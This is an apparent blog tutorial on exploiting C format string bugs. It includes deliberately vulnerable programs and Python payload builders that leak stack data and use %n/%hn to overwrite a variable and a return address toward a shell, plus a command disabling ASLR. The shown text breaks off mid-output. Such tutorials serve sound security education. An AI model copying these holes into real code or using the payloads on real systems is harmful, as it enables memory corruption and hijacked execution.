0xNinjaCyclone Blog

Penetration tester and Red teamer


[Exploit development] 7- How to do magic with string format bugs

Intro

Welcome everyone, to the seventh part of the exploit development series. In this article, we will discuss the string format vulnerability and the scientific and programming concepts behind it. This will lead us to answer many questions, such as why it occurs and how to make the most of it and exploit it optimally.

In the beginning, I would like to say that this type of vulnerabilities has become very rare to occur, but the concepts that you will learn will definitely benefit you, increase your skills as an exploit developer, and improve your way of thinking and methodology.

Variable Length Argument in C

C programming language supports a feature called “Variable Length Argument”, this feature allows a function to explicitly receive any number of arguments at runtime. This feature is clearly visible in functions such as printf, fprintf, and sprintf. If you have ever used one of these methods, you will notice that we can smoothly pass many arguments to them, that happens because the feature we’re talking about. Understanding this feature very well is the key to understand the vulnerability of today and the amazing exploitation techniques of it.

Practical example for Variable Length Argument feature

Let’s explore a practical example in C to clarify:

#include <stdio.h>
#include <stdarg.h>

void SayHello(int nSize, ...)
{
    va_list ap;

    va_start( ap, nSize );

    while ( nSize-- )
        printf( "Hello %s\n", va_arg(ap, char *) );

    va_end( ap );
}

int main()
{
    SayHello( 3, "Abdallah", "Hamza", "Hossam" );
    return 0;
}

Let’s compile this program and show you the output.

┌──(abdallah㉿pc)-[~/path/to]
└─$ gcc VarLenArg.c -o VarLenArg

┌──(abdallah㉿pc)-[~/path/to]
└─$ ./VarLenArg 
Hello Abdallah
Hello Hamza
Hello Hossam

How does the Variable Length Argument feature work ?

When the SayHello function is called, a new stack frame will be initialized above the main’s stack frame, the explicitly passed arguments will be pushed onto that stack frame and the stack layout will become as follows.

As You understood from the picture, what va_start macro did is give us a pointer to that area within the stack where our arguments live, and va_arg macro crawls the stack and gives us our data whatever its type, because the size of the required data can be simply calculated and cast by the macro depending on the second parameter it need. Let’s run the program under gdb to see what happens exactly.

gdb -nx -q ./VarLenArg
b SayHello
r
disas SayHello

The mentioned instructions are responsible for pushing the arguments onto the stack, let’s give the gdb an order to execute them, and examming the stack via the following commands.

stepi 7
x/3a $rbp-0xa8
x/s 0x55555555601b
x/s 0x555555556015
x/s 0x55555555600e

Well, but what about Windows OS? Does that feature work as same as Linux, or are they different? Let us compile the example code on Windows and reverse it to explore that feature and understand how it exactly works.

Let’s explain the picture and understand it, first, the procedure obtains a pointer that points to what is behind our data in the stack via Load Effective Address instruction, notice that the value of the EDI register contains now that address, and then the function enters a loop. What the iteration loop does is decrease the value of ESI which is the nSize variable that tells the function how many arguments have been passed to it, then the RDI will jump four bytes (the size of addresses in 32-bit systems) to point to the data which in the stack that passed through the function call, after that some parameters will be pushed onto the stack (that decreases ESP automatically) and printf function will be called via EBX that contains its address as appear in the picture, then the stack pointer will bring down again and the function will check if the ESI became zero if not, the code will jump to up and doing what we’ve explained again and continue in crawling the stack until the ESI breaks the loop.

There is nothing new. What we explained above on Linux is the same as what happens on Windows. But doesn’t the explanation draw your attention to something? Let’s ask the question in another way: What if we could force the loop to continue processing more data than is actually in the stack? An amazing scenario and this is the idea behind string format vulnerabilities.

String Format Bugs

Most string format functions in C programming language such as scanf, printf, sprintf, and syslog are using the Variable Length Argument feature to allow users to format their data easily whatever the type of the data. Also, some Interpreters and Virtual Machines like Python language use internally that feature in APIs such as PyArg_Parse, PyArg_ParseTupleAndKeywords, PyArg_ParseTuple, and a lot more. String format functions take exactly a punch of format specifiers in a string, each specifier represents data of a specific type on the stack, based on that format, the functions retrieve and process the data. However, the bug occurs when users can control that format by passing their own.

Vulnerable code

Let me show you a simple example of code vulnerable to the string format bug, so we can learn about the vulnerability and how to benefit from it and exploit it.

#include <stdio.h>

void vulnerable(char *cpStr)
{
    printf( cpStr );
}

int main(int argc, char *argv[])
{
    char *secret = "This is a top secret data `_`";

    if ( argc > 1 )
        vulnerable( argv[1] );

    return 0;
}

That’s a so basic code that takes its input from command line arguments, if the user has passed an input will display it on the screen.

┌──(abdallah㉿pc)-[~]
└─$ gcc test.c -o test

┌──(abdallah㉿pc)-[~]
└─$ ./test "Hello World!"
Hello World!
┌──(abdallah㉿pc)-[~]
└─$ 

But when analyzing that and starting exploring the manual page of the printf function and getting its declaration will see that:

int printf(const char *restrict format, ...);

DAMN, We actually control the format that leads the function in dealing with the args in the stack, that means we can completely hijack the execution flow of the function and trick it to crawls the stack and leaking sensitive data from it or doing dangerous stuff depending on the features that the function provides us.

Exploitation

Let’s inject a malicious format and see what happen:

┌──(abdallah㉿pc)-[~]
└─$ ./test '===> { %p %p %p %p %p } <==='
===> { 0x7ffedfe63098 0x7ffedfe630b0 0x7fc931c9d738 (nil) 0x7fc931cdb1f0 } <===
┌──(abdallah㉿pc)-[~]
└─$ 

As you see we can successfully trick the function to crawl the stack and obtain valuable data from it.

Crashing the application

First, let’s generate a format that prints out 30 address from the stack using this command python3 -c 'print("%p " * 30)' and passing that as a payload into the program.

┌──(abdallah㉿pc)-[~]
└─$ ./test '%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p'
0x7fff1c7ba4f8 0x7fff1c7ba510 0x7f1577cc5738 (nil) 0x7f1577d031f0 (nil) 0x7fff1c7bc396 0x7fff1c7ba400 0x562cb2db81b2 0x7fff1c7ba4f8 0x2b2db8060 0x7fff1c7ba4f0 0x562cb2db9010 (nil) 0x7f1577b1e7fd 0x7fff1c7ba4f8 0x21c7fc000 0x562cb2db817f 0x7fff1c7ba809 0x562cb2db81c0 0x3e09cd93ee28e7d0 0x562cb2db8060 (nil) (nil) (nil) 0xc1f7f564a608e7d0 0xc02322f02144e7d0 (nil) (nil) (nil)
┌──(abdallah㉿pc)-[~]
└─$ 

As you see, the fourth and sixth pointers are NULL, we can target them only as follows:

┌──(abdallah㉿pc)-[~]
└─$ ./test '%4$p'
(nil)
┌──(abdallah㉿pc)-[~]
└─$ ./test '%6$p'
(nil)
┌──(abdallah㉿pc)-[~]
└─$ 

Great, the function supports %s format specifier that allows developers to format strings with other data, that means the function will dereference the string pointer that points to the characters but what if we forced it to dereference an invalid pointer like the eleventh pointer ?? let’s test it and see what going to happen.

┌──(abdallah㉿pc)-[~]
└─$ ./test '%11$s'
Segmentation fault

┌──(abdallah㉿pc)-[~]
└─$ 

BINGO, We crashed the program and forced it to stop and never complete its task. There are more methods such as %n to force the program to crash.

Leaking sensitive data

Let’s try to leak the secret variable within the main function. First, we need to determine from where we start reading and the position of the targeted data, let’s run the program under gdb and try exploring that needed information.

gdb -nx -q ./test
b main
r "%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p"
disas main
b *0x00005555555551ad
c
x/a $rbp-0x8
x/s 0x555555556010

First, we let the main function execute the code responsible for putting the targeted data onto the stack, when we examine the stack we clearly see that the targteted pointer lives in 0x7fffffffdf18 within the stack. Now we are in the step before calling the vulnerable function let’s continue.

si 8
disas vulnerable

Depending on the size of the vulnerable stack frame, we start reading the stack to determine from where exactly the printf function starts reading as shown in the picture below.

As shown in the picture the function starts reading from $rbp-0x38, so we start calculating the secret data offset from the address that the function start reading from.

Well, we’ve added one to the five missing pointers at first ( because format specifiers start accessing from one not zero ) multiplied by the pointer’s size which is eight. Let’s run the program again and inject %13$s as a payload.

BINGO, We could dynamically force the printf function to leak targeted secret data from the stack.

Redirecting execution flow

In order to control the flow of program execution or arbitrarily execute specific code or function, we must overwrite one of the function pointers or poison the Goblal Offset Table. We can also do the same thing by overwriting the instruction pointer that is in the stack, but the question now is how can we exploit the vulnerability to do that.

String format functions support an interesting feature or specifier called %n, that specifier requires an int pointer and writes in that variable how many characters have been processed by the function. This is a great feature that should be exploited since we have control over which variable we want to target, as we explained before, and we are able to read specific data from the stack. We can also target any data or position within the stack to overwrite it via that feature. We can write the data or addresses that we specifically want by passing the appropriate number of characters to the function. This is difficult to do manually and requires developing an automation script that exploits the bug in any programming language such as Python or Ruby. Let’s try to exploit the following program:

#include <stdio.h>
#include <stdlib.h>

int deadvar = 0;

void pwnme()
{
    system( "/bin/sh" );
}

void vulnerable()
{
    char cStrFmt[8192];
    fgets( cStrFmt, sizeof(cStrFmt), stdin );
    printf( cStrFmt );
}

void main()
{
    vulnerable();

    if ( deadvar == 1337 )
    {
        puts("This branch should never be accessed yet !!!");
        puts("You won ^_^");
    }
    
}

Compile using gcc -m32 test.c -o test to prepare our test case:

┌──(abdallah㉿pc)-[~]
└─$ python3 -c "print('A' * 16 + ' %p' * 30)" | ./test
AAAAAAAAAAAAAAAA 0x2000 0xf7f9a580 0x56556207 0x41414141 0x41414141 0x41414141 0x41414141 0x20702520 0x25207025 0x70252070 0x20702520 0x25207025 0x70252070 0x20702520 0x25207025 0x70252070 0x20702520 0x25207025 0x70252070 0x20702520 0x25207025 0x70252070 0x20702520 0x25207025 0x70252070 0x20702520 0x25207025 0x70252070 0x20702520 0xa7025

Great, it’s vulnerable and we can inject our malicious payloads/formats via stdin. As you see from the output above our malicious format goes to the stack in the fourth parameter, let’s ensure that:

┌──(abdallah㉿pc)-[~]
└─$ echo 'AAAAA%4$p' | ./test
AAAAA0x41414141

Well, remember that because we going to abuse this fact later. Now as shown in the vulnerable code snippet, the conditional branch inside the main function is designed to be unreachable because the condition will never be true, let us fulfill the condition by overwriting the deadvar. First, we need to disable ASLR to make sure nothing will stop us, we can use this command to disable it:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

We must now obtain the address of the deadvar variable in the memory through gdb to overwrite it, this is very simple we can do it as follows:

(gdb) p &deadvar
$1 = (<data variable, no debug info> *) 0x5655902c <deadvar>

Great, things are going well. Now to successfully develop our exploit we need to make printf function print out 1337 characters on the screen. Moreover, we need to passing the deadvar address to the printf as a paramter to overwrite it. The question now how we can do it? Umm, Our options are not that many because the program is very small and does not take a lot of input, but did you remember when i told you that our format goes to the stack? we can abuse this fact to implicitly pass the targted address to the printf function. We can also abuse environment variables, but we will not use this way now. Let’s start developing our exploit based on the first method, by poisoning the format:

# Author     ==> Abdallah Mohamed (0xNinjaCyclone)
# 0x5655902c <== target (deadvar)

payload  = b""
payload += b"\x2c\x90\x55\x56" # deadvar address in little endian format
payload += b"A" * ( 1337 - len(payload) ) 
payload += b"%4$n" # pass the deadvar address as a parameter to printf

with open("exploit.txt", "wb+") as f:
    f.write(payload)

Let’s try it under gdb and see what going to happen:

┌──(abdallah㉿pc)-[~]
└─$ gdb -nx -q ./test
Reading symbols from ./test...
(No debugging symbols found in ./test)
(gdb) b main
Breakpoint 1 at 0x1254
(gdb) r < exploit.txt
Starting program: /home/abdallah/test < exploit.txt

Breakpoint 1, 0x56556254 in main ()
(gdb) disas main
Dump of assembler code for function main:
   0x56556245 <+0>:	lea    0x4(%esp),%ecx
   0x56556249 <+4>:	and    $0xfffffff0,%esp
   0x5655624c <+7>:	push   -0x4(%ecx)
   0x5655624f <+10>:	push   %ebp
   0x56556250 <+11>:	mov    %esp,%ebp
   0x56556252 <+13>:	push   %ebx
   0x56556253 <+14>:	push   %ecx
=> 0x56556254 <+15>:	call   0x565560d0 <__x86.get_pc_thunk.bx>
   0x56556259 <+20>:	add    $0x2da7,%ebx
   0x5655625f <+26>:	call   0x565561f8 <vulnerable>
   0x56556264 <+31>:	mov    0x2c(%ebx),%eax
   0x5655626a <+37>:	cmp    $0x539,%eax
   0x5655626f <+42>:	jne    0x56556295 <main+80>
   0x56556271 <+44>:	sub    $0xc,%esp
   0x56556274 <+47>:	lea    -0x1ff0(%ebx),%eax
   0x5655627a <+53>:	push   %eax
   0x5655627b <+54>:	call   0x56556050 <puts@plt>
   0x56556280 <+59>:	add    $0x10,%esp
   0x56556283 <+62>:	sub    $0xc,%esp
   0x56556286 <+65>:	lea    -0x1fc3(%ebx),%eax
   0x5655628c <+71>:	push   %eax
   0x5655628d <+72>:	call   0x56556050 <puts@plt>
   0x56556292 <+77>:	add    $0x10,%esp
   0x56556295 <+80>:	nop
   0x56556296 <+81>:	lea    -0x8(%ebp),%esp
   0x56556299 <+84>:	pop    %ecx
   0x5655629a <+85>:	pop    %ebx
   0x5655629b <+86>:	pop    %ebp
   0x5655629c <+87>:	lea    -0x4(%ecx),%esp
   0x5655629f <+90>:	ret    
End of assembler dump.
(gdb) b *0x56556264
Breakpoint 2 at 0x56556264
(gdb) p (int) deadvar
$1 = 0

We have two breakpoints, one on the main function and another one after calling the vulnerable function. Now the deadvar is zero as shown above. Let’s continue:

(gdb) c
Continuing.
,�UVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 2, 0x56556264 in main ()
(gdb) p (int) deadvar
$2 = 1337

Great, things are going well. We could successfully overwrite the deadvar variable and the condition should now be met and the unaccessible code will be executed, let’s continue and see what going on.

(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAThis branch should never be accessed yet !!!
You won ^_^
[Inferior 1 (process 5287) exited with code 014]

We succeeded, guys, and we were able to change the execution flow of the program. Next step let’s try to call pwnme function and get a shell, firstly, we have to obtain its address via p command using gdb:

(gdb) p pwnme
$1 = {<text variable, no debug info>} 0x565561cd <pwnme>

Well, we’ve got the address we need, let’s modify our exploit. Unfortunately, there is a problem with writing the pwnme address to the instruction pointer we need to make the printf function print out hundreds of millions of characters on the screen to write the pwnme address on the targeted area successfully. This is crazy, this can effectively kill the terminal or crash the program. We need to think deeply and find another way. How can we solve this problem? Fortunately, string format functions support writing the number of processed characters to a short variable using %hn format specifier. So we can divide the writing into two stages. In the first stage we write one part and then we write another part. This will reduce the number of characters to be printed on the screen. Let’s do it.

The first step is obtaining the return address to target it, this is not difficult we can grab it as follows:

┌──(abdallah㉿pc)-[~]
└─$ gdb -nx -q ./test
Reading symbols from ./test...
(No debugging symbols found in ./test)
(gdb) b vulnerable 
Breakpoint 1 at 0x11fc
(gdb) r
Starting program: /home/abdallah/test 

Breakpoint 1, 0x565561fc in vulnerable ()
(gdb) x/a $ebp+0x4
0xffffd13c:	0x56556264 <main+31>

Very nice. our target is 0xffffd13c address and we should write 0x565561cd to it, let’s try to do it and develop the exploit.

# Author     ==> Abdallah Mohamed (0xNinjaCyclone)
# 0xffffd13c <== target (return address pointer)
# 0x565561cd <== pwnme address

payload  = b""
payload += b"\x3c\xd1\xff\xff" # return address in little endian format (low order)
payload += b"\x3e\xd1\xff\xff" # return address in little endian format (high order)
payload += b"A" * ( 0x61cd - len(payload) ) 
payload += b"%4$hn" # pass the low order address as a parameter to printf
payload += b"B" * ( 0x5655 - len(payload) ) 
payload += b"%5$hn" # pass the high order address as a parameter to printf

with open("exploit.txt", "wb+") as f:
    f.write(payload)

Let’s run this exploit and see what going on:

──(abdallah㉿pc)-[~]
└─$ gdb -nx -q ./test
Reading symbols from ./test...
(No debugging symbols found in ./test)
(gdb) b vulnerable 
Breakpoint 1 at 0x11fc
(gdb) r < exploit.txt
Starting program: /home/abdallah/test < exploit.txt

Breakpoint 1, 0x565561fc in vulnerable ()
(gdb) disas vulnerable 
Dump of assembler code for function vulnerable:
   0x565561f8 <+0>:	push   %ebp
   0x565561f9 <+1>:	mov    %esp,%ebp
   0x565561fb <+3>:	push   %ebx
=> 0x565561fc <+4>:	sub    $0x2004,%esp
   0x56556202 <+10>:	call   0x565560d0 <__x86.get_pc_thunk.bx>
   0x56556207 <+15>:	add    $0x2df9,%ebx
   0x5655620d <+21>:	mov    -0xc(%ebx),%eax
   0x56556213 <+27>:	mov    (%eax),%eax
   0x56556215 <+29>:	sub    $0x4,%esp
   0x56556218 <+32>:	push   %eax
   0x56556219 <+33>:	push   $0x2000
   0x5655621e <+38>:	lea    -0x2008(%ebp),%eax
   0x56556224 <+44>:	push   %eax
   0x56556225 <+45>:	call   0x56556040 <fgets@plt>
   0x5655622a <+50>:	add    $0x10,%esp
   0x5655622d <+53>:	sub    $0xc,%esp
   0x56556230 <+56>:	lea    -0x2008(%ebp),%eax
   0x56556236 <+62>:	push   %eax
   0x56556237 <+63>:	call   0x56556030 <printf@plt>
   0x5655623c <+68>:	add    $0x10,%esp
   0x5655623f <+71>:	nop
   0x56556240 <+72>:	mov    -0x4(%ebp),%ebx
   0x56556243 <+75>:	leave  
   0x56556244 <+76>:	ret    
End of assembler dump.
(gdb) x/a 0xffffd13c
0xffffd13c:	0x56556264 <main+31>

We put a breakpoint on the vulnerable function, then run the program and pass the payload, when we examine the return address we see that it returns to the main function. It is assumed that when the printf function is called, the address of the pwnme function is written over this data. Let’s put a breakpoint on ret instruction and re-investigate if the expected data has been written or not:

(gdb) b *0x56556244
Breakpoint 2 at 0x56556244
(gdb) c
Continuing.
<���>���AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA